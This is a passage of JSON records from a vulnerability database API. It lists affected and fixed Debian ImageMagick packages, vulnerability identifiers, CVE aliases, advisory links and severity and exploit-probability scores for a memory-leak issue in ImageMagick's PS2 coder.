"vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-7395" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-n22y-f9az-fubm" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82057?format=api", "vulnerability_id": "VCID-neaa-39c7-sfbc", "summary": "ImageMagick: memory leak in Huffman2DEncodeImage in coders/ps2.c", "references": [ { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00040.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00040.html" }, { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00042.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00042.html" }, { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-16711.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-16711.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41284", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41194", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41365", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41409", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41306", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41376", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41405", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41332", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41383", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.4139", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41411", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41379", "published_at": "2026-04-18T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/issues/1542", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/ImageMagick/ImageMagick/issues/1542" }, { "reference_url": "https://www.debian.org/security/2020/dsa-4712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1801673", "reference_id": "1801673", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1801673" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:7.0.8-40:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-40:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:7.0.8-40:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16711", "reference_id": "CVE-2019-16711", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:M/Au:N/C:N/I:N/A:P" }, { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16711" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" }, { "reference_url": "https://usn.ubuntu.com/7053-1/", "reference_id": "USN-7053-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7053-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { 